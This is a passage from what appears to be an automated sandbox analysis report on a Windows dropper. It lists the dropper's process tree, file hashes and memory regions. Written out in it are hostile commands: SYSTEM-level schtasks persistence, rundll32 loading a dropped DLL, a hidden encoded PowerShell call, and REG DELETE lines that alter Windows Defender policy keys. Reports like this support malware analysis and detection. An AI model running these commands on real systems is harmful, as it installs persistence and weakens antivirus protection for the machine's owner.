                                                                                                            schtasks /run /I /tn "gXEayGZYk"
                                                                                                            2⤵
                                                                                                              PID:4564
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /DELETE /F /TN "gXEayGZYk"
                                                                                                              2⤵
                                                                                                                PID:2984
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /CREATE /TN "FFlCdDCQpdthnDzXV" /SC once /ST 12:52:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\ZiFHcXT.exe\" PY /site_id 525403 /S" /V1 /F
                                                                                                                2⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:4388
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /run /I /tn "FFlCdDCQpdthnDzXV"
                                                                                                                2⤵
                                                                                                                  PID:4016
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:4340
                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                  2⤵
                                                                                                                    PID:1204
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                  1⤵
                                                                                                                    PID:3504
                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                    1⤵
                                                                                                                      PID:1984
                                                                                                                    • C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\ZiFHcXT.exe
                                                                                                                      C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\ZiFHcXT.exe PY /site_id 525403 /S
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks computer location settings
                                                                                                                      • Drops Chrome extension
                                                                                                                      • Drops desktop.ini file(s)
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:448
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks /DELETE /F /TN "bJrbMHMDNUyqMIPThG"
                                                                                                                        2⤵
                                                                                                                          PID:1828
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                          2⤵
                                                                                                                            PID:3600
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:3948
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                              2⤵
                                                                                                                                PID:3684
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:3228
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jPDVFKipU\osfrqn.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SXVvvXCuCecgohx" /V1 /F
                                                                                                                                  2⤵
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:1948
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /CREATE /TN "SXVvvXCuCecgohx2" /F /xml "C:\Program Files (x86)\jPDVFKipU\RSLJtAC.xml" /RU "SYSTEM"
                                                                                                                                  2⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:680
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /END /TN "SXVvvXCuCecgohx"
                                                                                                                                  2⤵
                                                                                                                                    PID:4768
                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    schtasks /DELETE /F /TN "SXVvvXCuCecgohx"
                                                                                                                                    2⤵
                                                                                                                                      PID:1328
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "EOkhxrYxAEIuAx" /F /xml "C:\Program Files (x86)\fCscXRmSsoZU2\iBKpDxJ.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:3188
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "PwfdYqkpoBAoU2" /F /xml "C:\ProgramData\NTslqXAyKxgJdOVB\fEUDUqU.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:2972
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "sZntjluwdORXGerps2" /F /xml "C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\sRoWRPe.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:4620
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "hUZrJIygDlPKjnJiuVx2" /F /xml "C:\Program Files (x86)\yNjTJhHiELlhC\cTLLege.xml" /RU "SYSTEM"
                                                                                                                                      2⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:2668
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "ZGhVhnWHpCkuylUXB" /SC once /ST 06:35:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\xKkxXQQPSIyydVpo\BjIblgmr\CMiJsoz.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:2892
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /run /I /tn "ZGhVhnWHpCkuylUXB"
                                                                                                                                      2⤵
                                                                                                                                        PID:3260
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                        2⤵
                                                                                                                                          PID:1964
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                            3⤵
                                                                                                                                              PID:2392
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                            2⤵
                                                                                                                                              PID:1248
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:1148
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "FFlCdDCQpdthnDzXV"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2408
                                                                                                                                              • C:\Windows\system32\rundll32.EXE
                                                                                                                                                C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xKkxXQQPSIyydVpo\BjIblgmr\CMiJsoz.dll",#1 /site_id 525403
                                                                                                                                                1⤵
                                                                                                                                                  PID:4072
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\xKkxXQQPSIyydVpo\BjIblgmr\CMiJsoz.dll",#1 /site_id 525403
                                                                                                                                                    2⤵
                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                    PID:1340
                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                      schtasks /DELETE /F /TN "ZGhVhnWHpCkuylUXB"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1548

                                                                                                                                                  Network

                                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                                  Replay Monitor

                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                  Downloads

                                                                                                                                                  • C:\Program Files (x86)\acZjXHcfgPYOcXywQzR\sRoWRPe.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    54cd1328c042c79a6633a2bb38b3c4d6

                                                                                                                                                    SHA1

                                                                                                                                                    bbc8a437ae86de23e38788a82944474011ce3997

                                                                                                                                                    SHA256

                                                                                                                                                    1d98c8dc577f373e4d5739c93421c44fc09aac5bd50e2b6f157cc271f095826d

                                                                                                                                                    SHA512

                                                                                                                                                    ffd2d979d3b0e3da5a2167df7fd6d9b3405d77240093238f8102ab4ebd7642fd6bd7c89272b476196e03e29c3463cfc15af539e134d237204a058ecafa52cea7

                                                                                                                                                  • C:\Program Files (x86)\fCscXRmSsoZU2\iBKpDxJ.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    b22ec4e7ff2fa55db5dbcbfec2b5ed0f

                                                                                                                                                    SHA1

                                                                                                                                                    84313bc047f47aa75413a6213b6a4bcb2e20cd54

                                                                                                                                                    SHA256

                                                                                                                                                    009d9cc0d213bd594507d38fc311162857fc21daa714b2718e3e9b41b6a09aa7

                                                                                                                                                    SHA512

                                                                                                                                                    c1132b03d4aae1540c8ba32912c351b4d526c60de1a6b25a6e82954763d6833899df5f92d437b0ffb430a7d42f8536fad0c17926c5878883bf532855bfe170b6

                                                                                                                                                  • C:\Program Files (x86)\jPDVFKipU\RSLJtAC.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    bf536afe654459c7ca486f825472d708

                                                                                                                                                    SHA1

                                                                                                                                                    0f823b581f45b4a72860b038e1e3684973b6b677

                                                                                                                                                    SHA256

                                                                                                                                                    77b18514b619f7810d94089d9766932db114d107d6d8d29eddc6de3e1e635e15

                                                                                                                                                    SHA512

                                                                                                                                                    b90577e1ba0f709f863838aa1cd5d2827a7c0736f40a5c5d30135fb5391e9de24deca871dc449bdca8badb26b2870428cdaf6a2ec514a9a6a0fec1068eec5118

                                                                                                                                                  • C:\Program Files (x86)\yNjTJhHiELlhC\cTLLege.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    9b55df3441137d8b92f2e77fd01ec37f

                                                                                                                                                    SHA1

                                                                                                                                                    5e31b6e6d6ce551d620a6933a4792287ca0bc497

                                                                                                                                                    SHA256

                                                                                                                                                    3193734a65b7d03423c567c79d37092c311208fc7a0391549b3dcb371fe60097

                                                                                                                                                    SHA512

                                                                                                                                                    7fb9de431e63b50d96f9d3f007c3c5927f467c0531b865bdfc38ff505c749373c1715450b6aaa73d124004b753723154e61f8d1587d0cddb92ff2ad94a1db13f

                                                                                                                                                  • C:\ProgramData\NTslqXAyKxgJdOVB\fEUDUqU.xml

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    d99646fa3270656c19623c33c218361f

                                                                                                                                                    SHA1

                                                                                                                                                    dd7ce3d36a5844e16fca3bdeaba871d5517c05c4

                                                                                                                                                    SHA256

                                                                                                                                                    70edec2a6938c2b961befb031facb9e589408f81c82d7555362a6b8247056b64

                                                                                                                                                    SHA512

                                                                                                                                                    a2bb3eb8719c36f4d0b7341c32bf46813c35cfb77514e73cd3b3c6e20bc8030cbea1f435f8e5017bcb3da992221c8939bcc7d54d8105eaec139266fd705e949f

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                    Filesize

                                                                                                                                                    2KB

                                                                                                                                                    MD5

                                                                                                                                                    6cf293cb4d80be23433eecf74ddb5503

                                                                                                                                                    SHA1

                                                                                                                                                    24fe4752df102c2ef492954d6b046cb5512ad408

                                                                                                                                                    SHA256

                                                                                                                                                    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                                                                                                    SHA512

                                                                                                                                                    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    64B

                                                                                                                                                    MD5

                                                                                                                                                    3ca1082427d7b2cd417d7c0b7fd95e4e

                                                                                                                                                    SHA1

                                                                                                                                                    b0482ff5b58ffff4f5242d77330b064190f269d3

                                                                                                                                                    SHA256

                                                                                                                                                    31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

                                                                                                                                                    SHA512

                                                                                                                                                    bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSE0B0.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.3MB

                                                                                                                                                    MD5

                                                                                                                                                    0164cb234b472f30b7563528ebe0cd66

                                                                                                                                                    SHA1

                                                                                                                                                    ee90433b4579a5e67273c0b0be168d0ea0e0b9e9

                                                                                                                                                    SHA256

                                                                                                                                                    0910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e

                                                                                                                                                    SHA512

                                                                                                                                                    179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSE0B0.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.3MB

                                                                                                                                                    MD5

                                                                                                                                                    0164cb234b472f30b7563528ebe0cd66

                                                                                                                                                    SHA1

                                                                                                                                                    ee90433b4579a5e67273c0b0be168d0ea0e0b9e9

                                                                                                                                                    SHA256

                                                                                                                                                    0910eb02fcd7ee5b30d0c82d45705baf7785a3915c8ef7469ee727eacb53948e

                                                                                                                                                    SHA512

                                                                                                                                                    179c30136d942260812efbc57d5577196819434f78cb2c1f04b526788f2707e3529eba949984777f81a857371f8499ac3cbc40918e24db8e0151ca20111e213a

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSE506.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    9c260f02466af673138ccb06e0158a79

                                                                                                                                                    SHA1

                                                                                                                                                    edb03d2ba61518454a696959c93fc459bafbab38

                                                                                                                                                    SHA256

                                                                                                                                                    304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c

                                                                                                                                                    SHA512

                                                                                                                                                    a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSE506.tmp\Install.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    9c260f02466af673138ccb06e0158a79

                                                                                                                                                    SHA1

                                                                                                                                                    edb03d2ba61518454a696959c93fc459bafbab38

                                                                                                                                                    SHA256

                                                                                                                                                    304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c

                                                                                                                                                    SHA512

                                                                                                                                                    a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\dHrUWvg.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    9c260f02466af673138ccb06e0158a79

                                                                                                                                                    SHA1

                                                                                                                                                    edb03d2ba61518454a696959c93fc459bafbab38

                                                                                                                                                    SHA256

                                                                                                                                                    304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c

                                                                                                                                                    SHA512

                                                                                                                                                    a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17

                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\FyanvruEjIbEvqxKf\fmiJyxyNihWESXk\dHrUWvg.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    9c260f02466af673138ccb06e0158a79

                                                                                                                                                    SHA1

                                                                                                                                                    edb03d2ba61518454a696959c93fc459bafbab38

                                                                                                                                                    SHA256

                                                                                                                                                    304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c

                                                                                                                                                    SHA512

                                                                                                                                                    a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                    Filesize

                                                                                                                                                    717B

                                                                                                                                                    MD5

                                                                                                                                                    ec8ff3b1ded0246437b1472c69dd1811

                                                                                                                                                    SHA1

                                                                                                                                                    d813e874c2524e3a7da6c466c67854ad16800326

                                                                                                                                                    SHA256

                                                                                                                                                    e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab

                                                                                                                                                    SHA512

                                                                                                                                                    e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9

                                                                                                                                                    Filesize

                                                                                                                                                    503B

                                                                                                                                                    MD5

                                                                                                                                                    621508f17d93fd294e34c57dfa64738d

                                                                                                                                                    SHA1

                                                                                                                                                    62461f51e5b931c49821642bce03bdcff0a03293

                                                                                                                                                    SHA256

                                                                                                                                                    6f69f363bd19069bcad746e7ae100f3efd32e71a91a876d1962e194e07719664

                                                                                                                                                    SHA512

                                                                                                                                                    640c241218f4fb8012c14e29d33473b93ac4382eba3e87d3795a15ba5a4467e8d3e403bc61842434d01115fa5ba237b2282990150993067239a93e7f9b84b970

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                                                                                                                                                    Filesize

                                                                                                                                                    192B

                                                                                                                                                    MD5

                                                                                                                                                    c3c73bf2219e9fef5e596cb73fe35056

                                                                                                                                                    SHA1

                                                                                                                                                    7c29a893dca610da9b2728a7674a09f12490a973

                                                                                                                                                    SHA256

                                                                                                                                                    08bab4df32a9dcf2fe84c54e6faf776eac5e190b4c9287a788af5ba0a8cdb9f0

                                                                                                                                                    SHA512

                                                                                                                                                    0d697af3547955be2d130f9829e3be1c6a8cec5092d7145c550ed2728e7169e02c1a6048ea94804ca2775989ba22d23c0389e757367b278007a7de1558c75d2a

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9

                                                                                                                                                    Filesize

                                                                                                                                                    560B

                                                                                                                                                    MD5

                                                                                                                                                    9858bd5f7c45af8cc1d0291e359bd6bc

                                                                                                                                                    SHA1

                                                                                                                                                    cf4bba1f481207e501888fcd1fb9372ecabe7973

                                                                                                                                                    SHA256

                                                                                                                                                    ba35759f2c6b7bd3dea9db9f5fed2921fa68e5fca228b0452f478b80ab8a83f9

                                                                                                                                                    SHA512

                                                                                                                                                    f2e8f196e763abad079885a68acc97dd251d689b94dbd8c07e8b32174d27c47e38df72bd8c3e0fb63ebcfb8d2d4452b3514b89d55dfee5feeb130eaa95f98105

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                    Filesize

                                                                                                                                                    1KB

                                                                                                                                                    MD5

                                                                                                                                                    33b19d75aa77114216dbc23f43b195e3

                                                                                                                                                    SHA1

                                                                                                                                                    36a6c3975e619e0c5232aa4f5b7dc1fec9525535

                                                                                                                                                    SHA256

                                                                                                                                                    b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

                                                                                                                                                    SHA512

                                                                                                                                                    676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

                                                                                                                                                  • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                    Filesize

                                                                                                                                                    11KB

                                                                                                                                                    MD5

                                                                                                                                                    d2599a484f9247a0bec0a58acfba3a27

                                                                                                                                                    SHA1

                                                                                                                                                    e46ea346878129af25f4081857b878bd58a8e475

                                                                                                                                                    SHA256

                                                                                                                                                    5c3901d344b531f2ca6b63e970b5ed33aa5645d615a710f57dc3fe00d4d29b98

                                                                                                                                                    SHA512

                                                                                                                                                    4772141ebcabe293c7f6f9a7f861df289948a0532265522c1f23a1bfeeeb7e569e557829321dc0771238154f507713645d82cc9919fe56ab13c8b463e95f4629

                                                                                                                                                  • C:\Windows\Temp\xKkxXQQPSIyydVpo\BjIblgmr\CMiJsoz.dll

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                    MD5

                                                                                                                                                    79c334ffda2ea8a633a7261c23d5b0d1

                                                                                                                                                    SHA1

                                                                                                                                                    1a034c55ee56cf1def308077354686333c9c8094

                                                                                                                                                    SHA256

                                                                                                                                                    fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5

                                                                                                                                                    SHA512

                                                                                                                                                    72307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a

                                                                                                                                                  • C:\Windows\Temp\xKkxXQQPSIyydVpo\BjIblgmr\CMiJsoz.dll

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                    MD5

                                                                                                                                                    79c334ffda2ea8a633a7261c23d5b0d1

                                                                                                                                                    SHA1

                                                                                                                                                    1a034c55ee56cf1def308077354686333c9c8094

                                                                                                                                                    SHA256

                                                                                                                                                    fd7dbd3d96ef470cdc0de56004b39e34bf3159e7bcd777a6d437345d142e27f5

                                                                                                                                                    SHA512

                                                                                                                                                    72307c88233f6752c6ceb3ed1b5631f61a999af3646cb56ecf917d2d0e7625af3a12b07655be792214307c72fc9ba950a2c690ed7354b822a19cefcd4a25560a

                                                                                                                                                  • C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\ZiFHcXT.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    9c260f02466af673138ccb06e0158a79

                                                                                                                                                    SHA1

                                                                                                                                                    edb03d2ba61518454a696959c93fc459bafbab38

                                                                                                                                                    SHA256

                                                                                                                                                    304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c

                                                                                                                                                    SHA512

                                                                                                                                                    a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17

                                                                                                                                                  • C:\Windows\Temp\xKkxXQQPSIyydVpo\TuonOlJicieyOJk\ZiFHcXT.exe

                                                                                                                                                    Filesize

                                                                                                                                                    6.8MB

                                                                                                                                                    MD5

                                                                                                                                                    9c260f02466af673138ccb06e0158a79

                                                                                                                                                    SHA1

                                                                                                                                                    edb03d2ba61518454a696959c93fc459bafbab38

                                                                                                                                                    SHA256

                                                                                                                                                    304dea5bce7bf7fadb7cc65e97fddfe0a4efb6fe27dd80b2b6775326cbf0fe3c

                                                                                                                                                    SHA512

                                                                                                                                                    a1579a5b0f51a8daa523aec90eff3e5c23ca55131b74d652618bccb864ef0d1ac620fe0f8dbc468770d8a164b16fbfc519d5a6a022656f019a47645b5650af17

                                                                                                                                                  • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                    Filesize

                                                                                                                                                    5KB

                                                                                                                                                    MD5

                                                                                                                                                    d3a51df1d0047a0f060dcd722c05246e

                                                                                                                                                    SHA1

                                                                                                                                                    fd6a19bc6e324dc7059bd28dcb7912dae9cbc977

                                                                                                                                                    SHA256

                                                                                                                                                    d5f36070b46d951d1afe7f06016b8386b73dc4c236a6870418ca7a047076e4df

                                                                                                                                                    SHA512

                                                                                                                                                    dc93abcb7f7ceab0b628e8078e112c14c551e814b182a36c0a2fb5fd0eb9000fc2183ff6f7be2ff9ab404f15d150521b1dcb5531564a2927a76caf69052ba274

                                                                                                                                                  • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                    Filesize

                                                                                                                                                    268B

                                                                                                                                                    MD5

                                                                                                                                                    a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                    SHA1

                                                                                                                                                    1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                    SHA256

                                                                                                                                                    9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                    SHA512

                                                                                                                                                    9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                  • memory/448-243-0x0000000004460000-0x00000000044D8000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    480KB

                                                                                                                                                  • memory/448-229-0x0000000003CF0000-0x0000000003D75000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    532KB

                                                                                                                                                  • memory/448-247-0x0000000004D10000-0x0000000004DC7000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    732KB

                                                                                                                                                  • memory/448-233-0x00000000041B0000-0x000000000421A000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    424KB

                                                                                                                                                  • memory/1168-154-0x00007FFBA90B0000-0x00007FFBA9B71000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/1168-152-0x00007FFBA90B0000-0x00007FFBA9B71000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    10.8MB

                                                                                                                                                  • memory/1168-151-0x0000024D58E90000-0x0000024D58EB2000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    136KB

                                                                                                                                                  • memory/1340-250-0x0000000001940000-0x00000000026B8000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    13.5MB

                                                                                                                                                  • memory/1600-138-0x0000000010000000-0x0000000010D78000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    13.5MB

                                                                                                                                                  • memory/2528-163-0x0000000003E90000-0x0000000003EC6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    216KB

                                                                                                                                                  • memory/2528-164-0x00000000045C0000-0x0000000004BE8000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                  • memory/2528-165-0x0000000004390000-0x00000000043B2000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    136KB

                                                                                                                                                  • memory/2528-166-0x0000000004D60000-0x0000000004DC6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    408KB

                                                                                                                                                  • memory/2528-167-0x0000000004E40000-0x0000000004EA6000-memory.dmp

